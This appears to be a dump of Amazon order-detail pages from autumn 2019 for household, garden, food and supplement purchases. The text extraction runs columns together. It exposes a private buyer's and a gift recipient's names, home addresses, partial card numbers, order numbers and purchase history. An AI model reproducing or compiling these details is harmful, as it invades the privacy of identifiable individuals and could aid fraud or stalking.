Cyclists, Fishermen, Gardeners and all Outdoor Activities. Sold by: Click2Solutions (seller profile) $9.96 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $9.96 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $9.96Brian Coady Estimated tax to be collected: $0.601454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$10.56 United States Credit Card transactions Visa ending in 7528: November 28, 2019:$10.56 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1513913-4053040 Order Placed: November 11, 2019 Amazon.com order number: 111-1513913-4053040 Order Total: $33.39 Shipped on November 12, 2019 Items Ordered 1 of: Millrose Available Mill-Rose 70886 Monster PTFE Pipe Thread Sealant Tape, 3/4Inch x 1429-Inches, Blue Sold by: Amazon.com Services LLC Price $6.72 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Shipped on November 11, 2019 Items Ordered 1 of: HQMPC Garden Hose Quick Connect Solid Brass Quick Connector Garden Hose Fitting Water Hose Connectors 3/4 inch GHT (2SETS) Sold by: Metals shop (seller profile) Price $13.99 Condition: New 1 of: Twinkle Star Garden Hose Coiled Spring Protector with Solid Brass Faucet Hoses Coupling Adapter Sold by: TTKLE STAR (seller profile) $10.79 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Print this page for your records. Payment information Payment Method: Visa | Last digits: 7528 Item(s) Subtotal: $31.50 Shipping & Handling: $0.00 ---- Billing address Brian Coady 1454 MONROE ST NW Total before tax: $31.50 Estimated tax to be collected: $1.89 ---- WASHINGTON, DC 20010-3139 Grand Total:$33.39 United States Credit Card transactions Visa ending in 7528: November 12, 2019: $7.12 Visa ending in 7528: November 11, 2019:$26.27 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0577191-3711400 Order Placed: November 8, 2019 Amazon.com order number: 111-0577191-3711400 Order Total: $28.61 Shipped on November 9, 2019 Items Ordered Price 1 of: NICREW Cat Water Fountain, Pet LED Flower Drinking Fountain for Small Dogs, Cat Water Dispenser with LED Nightlight and Stainless Steel Top, 2 Filters Sold by: NICREW (seller profile) $26.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $26.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $26.99Brian Coady Estimated tax to be collected: $1.621454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$28.61 United States Credit Card transactions Visa ending in 7528: November 9, 2019:$28.61 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1314822-3437065 Order Placed: November 7, 2019 Amazon.com order number: 111-1314822-3437065 Order Total: $0.00 Shipped on November 7, 2019 Items Ordered Price 1 of: Hiker Hunger 100% Carbon Fiber Trekking Poles – Ultralight & Collapsible with $69.97 Quick Flip-Lock, Cork Grips, Tungsten Tips Sold by: The Mandeville Shop (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Kathy Pieper 221 W CHOCOLAY ST MUNISING, MI 49862-1201 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $69.97 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Rewards Points Gift Wrap: $5.99 Gift Card Total before tax: $75.96Billing address Estimated tax to be collected: $0.00Brian Coady Gift Card Amount:-$27.36 1454 MONROE ST NW Rewards Points:-$48.60 WASHINGTON, DC 20010-3139 United States Grand Total: $0.00 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5692453-5626615 Order Placed: October 30, 2019 Amazon.com order number: 111-5692453-5626615 Order Total: $0.00 Shipped on October 30, 2019 Items Ordered Price 1 of: Logitech HD Powerline 200 Adapter -Connect Devices to Internet Using Existing $29.99 Power Outlets Sold by: D&D Gaming Corp. (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $29.99 Gift Card Shipping & Handling: $0.00 Billing address Total before tax: $29.99Brian Coady Estimated tax to be collected: $1.801454 MONROE ST NW Gift Card Amount:-$31.79 WASHINGTON, DC 20010-3139 United States Grand Total: $0.00 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1337627-9624209 Order Placed: October 30, 2019 Amazon.com order number: 111-1337627-9624209 Order Total: $0.00 Shipped on October 30, 2019 Items Ordered Price 1 of: ASURION 4 Year Office Equipment Protection Plan with Tech Support $20-29.99 Sold by: Asurion, LLC (seller profile) $3.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $3.99 Gift Card Shipping & Handling: $0.00 Billing address Total before tax: $3.99 Brian Coady Estimated tax to be collected: $0.241454 MONROE ST NW Gift Card Amount:-$4.23 WASHINGTON, DC 20010-3139 United States Grand Total: $0.00 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9702530-9835450 Order Placed: October 25, 2019 Amazon.com order number: 111-9702530-9835450 Order Total: $26.94 Shipped on October 25, 2019 Items Ordered Price 1 of: Vital Wheat Gluten, 4 Pounds 75 percent Protein, All Natural, Non-GMO, Bulk Sold by: Mulberry Lane Farm (seller profile) $26.94 Condition: New Packed bulk. Your purchase helps support our small organic family farm, Mulberry Lane Farm, in Central Illinois. Thank you! This product expires in a minimum of one year from today's date. Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $26.94 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $26.94 Brian Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$26.94 United States Credit Card transactions Visa ending in 7528: October 25, 2019:$26.94 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1543193-6073000 Subscribe and Save Order Placed: October 25, 2019 Amazon.com order number: 111-1543193-6073000 Order Total: $15.04 This order contains Subscribe & Save items. Shipped on November 7, 2019 Items Ordered Price 1 of: Hoosier Hill Farm Vital Wheat Gluten, 4 Pound Sold by: Amazon.com Services LLC $17.69 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $17.69 Visa | Last digits: 7528 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$2.65 Billing address Total before tax: $15.04Brian Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$15.04 United States Credit Card transactions Visa ending in 7528: November 7, 2019:$15.04 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-2504033-7001053 Subscribe and Save Order Placed: October 25, 2019 Amazon.com order number: 112-2504033-7001053 Order Total: $8.98 This order contains Subscribe & Save items. Shipped on November 3, 2019 Items Ordered Price 1 of: Lysol Laundry Sanitizer Additive, Crisp Linen, 90oz Sold by: Amazon.com Services LLC $9.97 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Chilled Shipping Payment information Payment Method: Item(s) Subtotal: $9.97 Visa | Last digits: 7528 Shipping & Handling: $0.00 Subscribe & Save:-$1.50 Billing address Brian Coady Total before tax: $8.471454 MONROE ST NW Estimated tax to be collected: $0.51WASHINGTON, DC 20010-3139 United States Grand Total: $8.98 Credit Card transactions Visa ending in 7528: November 3, 2019:$8.98 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-9940701-2551414 Subscribe and Save Order Placed: October 25, 2019 Amazon.com order number: 112-9940701-2551414 Order Total: $15.31 This order contains Subscribe & Save items. Shipped on November 7, 2019 Items Ordered Price 1 of: 4.4 LB Dishwasher Salt/Water Softener Salt -Compatible with Bosch, Miele, Whirlpool, Thermador and More (2 KG) Sold by: Impresa Products (seller profile) | Product question? Ask Seller $16.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $16.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$2.55 Billing address Total before tax: $14.44Brian Coady Estimated tax to be collected: $0.871454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$15.31 United States Credit Card transactions Visa ending in 7528: November 7, 2019:$15.31 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1595100-1339409 Order Placed: October 24, 2019 Amazon.com order number: 111-1595100-1339409 Order Total: $14.41 Shipped on October 25, 2019 Items Ordered Price 1 of: DR DISPOSAL makes installing a kitchen disposer much EASIER; it is a universal $13.59 garbage disposal tool for garbage disposal removal and INSTALLATION; it Sold by: ADInternational (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $13.59 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $13.59Brian Coady Estimated tax to be collected: $0.821454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$14.41 United States Credit Card transactions Visa ending in 7528: October 25, 2019:$14.41 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-6380748-7763409 Subscribe and Save Order Placed: October 24, 2019 Amazon.com order number: 113-6380748-7763409 Order Total: $12.74 This order contains Subscribe & Save items. Shipped on November 7, 2019 Items Ordered Price 1 of: Lakanto Monkfruit Sweetener, 1:1 Sugar Substitute, Keto, Non-GMO (Golden 1.76 lbs) Sold by: Lakanto (seller profile) $14.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $14.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Subscribe & Save: -$2.25 Billing address Brian Coady Total before tax: $12.741454 MONROE ST NW Estimated tax to be collected: $0.00WASHINGTON, DC 20010-3139 United States Grand Total:$12.74 Credit Card transactions Visa ending in 7528: November 7, 2019:$12.74 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0706059-7696257 Subscribe and Save Order Placed: October 24, 2019 Amazon.com order number: 111-0706059-7696257 Order Total: $10.60 This order contains Subscribe & Save items. Shipped on November 7, 2019 Items Ordered Price 1 of: HighKey Monk Fruit, Stevia, Erythritol Sweetener 2:1 Blend -Keto, Diabetic & Paleo Friendly -Granulated, Low Calorie, No Carb Natural Sugar Substitu Sold by: HighKey Snacks (seller profile) $12.47 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $12.47 Visa | Last digits: 7528 Shipping & Handling: $0.00 Subscribe & Save: -$1.87 Billing address Brian Coady Total before tax: $10.601454 MONROE ST NW Estimated tax to be collected: $0.00WASHINGTON, DC 20010-3139 United States Grand Total:$10.60 Credit Card transactions Visa ending in 7528: November 7, 2019:$10.60 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2091124-9455442 Order Placed: October 20, 2019 Amazon.com order number: 111-2091124-9455442 Order Total: $5.29 Shipped on October 20, 2019 Items Ordered Price 1 of: UPZHIJI Tea Strainer,Stainless Steel Mesh Tea Ball 2.1 Inch Tea Infuser Strainers ,Filters Tea Interval Diffuser for Tea (2 pcs) Sold by: Cheapestshopping (seller profile) $4.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $4.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $4.99Brian Coady Estimated tax to be collected: $0.30 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$5.29 United States Credit Card transactions Visa ending in 7528: October 20, 2019:$5.29 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9190295-5598603 Order Placed: October 12, 2019 Amazon.com order number: 111-9190295-5598603 Order Total: $15.89 Shipped on October 12, 2019 Items Ordered Price 1 of: Proctor Silex Easy Slice Electric Knife for Carving Meats, Poultry, Bread, Crafting $14.99 Foam and More, Lightweight with Contoured Grip, White (74311Y) Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $14.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $14.99Brian Coady Estimated tax to be collected: $0.901454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$15.89 United States Credit Card transactions Visa ending in 7528: October 12, 2019:$15.89 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0002087-5849039 Subscribe and Save Order Placed: October 9, 2019 Amazon.com order number: 111-0002087-5849039 Order Total: $0.00 This order contains Subscribe & Save items. Shipped on November 7, 2019 Items Ordered Price 1 of: Restaurant Sanitizer Chlorine Test Paper, 10-200 ppm [Vial of 100 Paper Strips] Sold by: Bartovation (seller profile) | Product question? Ask Seller $7.78 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $7.78 Visa | Last digits: 7528 Shipping & Handling: $0.00 Gift Card Subscribe & Save:-$0.78 Billing address Total before tax: $7.00Brian Coady Estimated tax to be collected: $0.421454 MONROE ST NW Gift Card Amount:-$7.42 WASHINGTON, DC 20010-3139 United States Grand Total: $0.00 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2512210-4513027 Order Placed: October 9, 2019 Amazon.com order number: 111-2512210-4513027 Order Total: $7.41 Shipped on October 9, 2019 Items Ordered Price 1 of: Toweter Twist Pins for Upholstery,Bedskirts and Slipcovers (30 Pieces) Sold by: Toweter (seller profile) $6.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $6.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $6.99 Brian Coady Estimated tax to be collected: $0.42 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$7.41 United States Credit Card transactions Visa ending in 7528: October 9, 2019:$7.41 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9482606-1724207 Subscribe and Save Order Placed: October 9, 2019 Amazon.com order number: 111-9482606-1724207 Order Total: $6.54 This order contains Subscribe & Save items. Shipped on November 7, 2019 Items Ordered Price 1 of: Spectrum Essentials Organic Ground Flaxseed, 24 Ounce (Pack of 1) Sold by: Amazon.com Services LLC $7.70 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $7.70 Visa | Last digits: 7528 Shipping & Handling: $0.00 Gift Card Subscribe & Save:-$1.16 Billing address Total before tax: $6.54Brian Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total: $6.54 United States Credit Card transactions Visa ending in 7528: November 7, 2019:$6.54 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-4301259-9792203 Order Placed: October 7, 2019 Amazon.com order number: 111-4301259-9792203 Order Total: $16.42 Shipped on October 8, 2019 Items Ordered Price 1 of: Rack-A-Tiers 52300 Studball, Colors May Vary (Basic pack) Sold by: a1-Components (seller profile) | Product question? Ask Seller $16.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $16.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Amazon Discount: -$1.50 Billing address Brian Coady Total before tax: $15.491454 MONROE ST NW Estimated tax to be collected: $0.93WASHINGTON, DC 20010-3139 United States Grand Total:$16.42 Credit Card transactions Visa ending in 7528: October 8, 2019:$16.42 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6339816-1819459 Order Placed: October 7, 2019 Amazon.com order number: 111-6339816-1819459 Order Total: $18.39 Shipped on October 7, 2019 Items Ordered Price 1 of: Grip 50 lb Telescopic Magnetic Pickup Tool Sold by: Amazon.com Services LLC $17.35 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $17.35 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $17.35 Brian Coady Estimated tax to be collected: $1.041454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$18.39 United States Credit Card transactions Visa ending in 7528: October 7, 2019:$18.39 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0833155-0103462 Subscribe and Save Order Placed: October 6, 2019 Amazon.com order number: 111-0833155-0103462 Order Total: $9.72 This order contains Subscribe & Save items. Shipped on November 7, 2019 Items Ordered Price 1 of: Amazon Brand -Solimo Coenzyme Q10 100 mg -Normal Energy Production, Supports Cardiovascular Health -3 Month Supply (90 Softgels) Sold by: Amazon.com Services LLC $12.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal:$12.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$1.95 Billing address Total before tax:$11.04 Brian Coady Estimated tax to be collected: $0.001454 MONROE ST NW Gift Card Amount: -$1.32 WASHINGTON, DC 20010-3139 United States Grand Total: $9.72 Credit Card transactions Visa ending in 7528: November 7, 2019:$9.72 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5498633-6907416 Subscribe and Save Order Placed: October 6, 2019 Amazon.com order number: 111-5498633-6907416 Order Total: $14.82 This order contains Subscribe & Save items. Shipped on November 7, 2019 Items Ordered Price 1 of: Solaray® Cal-Mag Citrate 1:1 | Calcium & Magnesium Citrate | For Healthy Bones, Teeth, Muscle & Nervous System Function | High Absorption | 180 Count Sold by: Healthway Shop (seller profile) $17.43 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $17.43 Visa | Last digits: 7528 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$2.61 Billing address Total before tax: $14.82Brian Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$14.82 United States Credit Card transactions Visa ending in 7528: November 7, 2019:$14.82 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3811211-8025011 Order Placed: October 4, 2019 Amazon.com order number: 111-3811211-8025011 Order Total: $9.53 Shipped on October 5, 2019 Items Ordered Price 1 of: Medpride Medical Exam Latex Gloves| 5 mil Thick, Large Box of 100| Powder-Free, $8.99 Non-Sterile, Heavy Duty Exam Gloves| Professional Grade for Hospitals, Sold by: HLmedical (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $8.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $8.99Brian Coady Estimated tax to be collected: $0.54 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$9.53 United States Credit Card transactions Visa ending in 7528: October 5, 2019:$9.53 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-4892465-0760265 Order Placed: October 1, 2019 Amazon.com order number: 111-4892465-0760265 Order Total: $19.03 Shipped on October 1, 2019 Items Ordered Price 1 of: Home Pest Repellent Spray -Natural Pest Control -Useful Against House Roach, $17.95 Spiders, Ants, Fleas -Fast Acting Pest Control Spray (16 Ounce) Sold by: Colton's Naturals (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $17.95 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $17.95Brian Coady Estimated tax to be collected: $1.081454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$19.03 United States Credit Card transactions Visa ending in 7528: October 1, 2019:$19.03 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0853051-4193062 Subscribe and Save Order Placed: October 1, 2019 Amazon.com order number: 111-0853051-4193062 Order Total: $0.00 This order contains Subscribe & Save items. Shipped on November 4, 2019 Items Ordered Price 1 of: Raid Multi Insect Killer, Orange Breeze, 15 OZ (Pack -1) Sold by: Amazon.com Services LLC $13.89 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $13.89 Visa | Last digits: 7528 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$2.08 Billing address Total before tax: $11.81Brian Coady Estimated tax to be collected: $0.711454 MONROE ST NW Gift Card Amount:-$12.52 WASHINGTON, DC 20010-3139 United States Grand Total: $0.00 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2315638-3720269 Subscribe and Save Order Placed: September 28, 2019 Amazon.com order number: 111-2315638-3720269 Order Total: $5.79 This order contains Subscribe & Save items. Shipped on September 29, 2019 Items Ordered Price 1 of: Amazon Brand -Solimo Vitamin D3 50 mcg (2000 IU), 365 Softgels, Value Size -$6.10 One Year Supply Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $6.10 Visa | Last digits: 7528 Shipping & Handling: $0.00 Subscribe & Save:-$0.31 Billing address Brian Coady Total before tax: $5.791454 MONROE ST NW Estimated tax to be collected: $0.00WASHINGTON, DC 20010-3139 United States Grand Total: $5.79 Credit Card transactions Visa ending in 7528: September 29, 2019:$5.79 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-8428328-8373006 Order Placed: September 26, 2019 Amazon.com order number: 111-8428328-8373006 Order Total: $31.50 Shipped on September 27, 2019 Items Ordered Price 1 of: Plyworx PLR15 Organize Your Pliers, Gray Sold by: Plyworx (seller profile) $14.95 Condition: New 1 of: Swing-A-Way COMINHKPR88501 Commercial Easy Crank Can Opener, 9” L x 2” W, Silver Sold by: Amazon.com Services LLC $14.76 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $29.71 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $29.71Brian Coady Estimated tax to be collected: $1.791454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$31.50 United States Credit Card transactions Visa ending in 7528: September 27, 2019:$31.50 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0698864-4287432 Order Placed: September 26, 2019 Amazon.com order number: 111-0698864-4287432 Order Total: $10.57 Shipped on September 26, 2019 Items Ordered Price 1 of: Dr. Earth Pure & Natural Compost Starter 3 lb Sold by: Amazon.com Services LLC $9.97 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $9.97 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $9.97 Brian Coady Estimated tax to be collected: $0.601454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$10.57 United States Credit Card transactions Visa ending in 7528: September 26, 2019:$10.57 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5035194-3065860 Order Placed: September 17, 2019 Amazon.com order number: 111-5035194-3065860 Order Total: $105.42 Shipped on September 18, 2019 Items Ordered Price 1 of: Memory Foam Mattress Topper King | Made In The USA, CertiPUR-US Certified 2 $99.45 Inch Bed Toppers King Size, Premium Medium-Soft Foam Mattress Topper King, Sold by: Comfort Factory (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Grand Total:$105.42 Payment information Payment Method: Visa | Last digits: 7528 Item(s) Subtotal: Shipping & Handling: $99.45 $0.00 Billing address Brian Coady 1454 MONROE ST NW Total before tax: Estimated tax to be collected: $99.45 $5.97 WASHINGTON, DC 20010-3139 United States Credit Card transactions Visa ending in 7528: September 18, 2019:$105.42 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9403926-3761839 Order Placed: September 17, 2019 Amazon.com order number: 111-9403926-3761839 Order Total: $12.69 Shipped on September 18, 2019 Items Ordered Price 1 of: ARTIKA Sewing KIT, Over 130 DIY Premium Sewing Supplies, Mini Sewing kit, 38 $11.97 Spools of Thread -20 Most Useful Colors & 18 Multi Colors, Extra 40 Quality Sewing pins, Travel, Kids, Beginners Sold by: uppex usa (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $11.97 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $11.97 Brian Coady Estimated tax to be collected: $0.721454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$12.69 United States Credit Card transactions Visa ending in 7528: September 18, 2019:$12.69 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0658140-2918665 Order Placed: September 13, 2019 Amazon.com order number: 111-0658140-2918665 Order Total: $14.99 Shipped on September 13, 2019 Items Ordered Price 1 of: Erythritol Sweetener Natural Sugar Substitute 3lb -Granulated Low Calorie Sweetener High Digestive Tolerance Suitable for Diabetes Keto and Paleo -Baking Substitute Non GMO Sold by: JSI Comm (seller profile) $14.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $14.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $14.99 Brian Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$14.99 United States Credit Card transactions Visa ending in 7528: September 13, 2019:$14.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5771993-0603419 Subscribe and Save Order Placed: September 13, 2019 Amazon.com order number: 111-5771993-0603419 Order Total: $12.10 This order contains Subscribe & Save items. Shipped on September 13, 2019 Items Ordered Price 1 of: Lakanto Monkfruit Sweetener, 1:1 Sugar Substitute, Keto, Non-GMO (Golden 1.76 lbs) Sold by: Lakanto (seller profile) $12.74 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $12.74 Visa | Last digits: 7528 Shipping & Handling: $0.00 Subscribe & Save: -$0.64 Billing address Brian Coady Total before tax: $12.101454 MONROE ST NW Estimated tax to be collected: $0.00WASHINGTON, DC 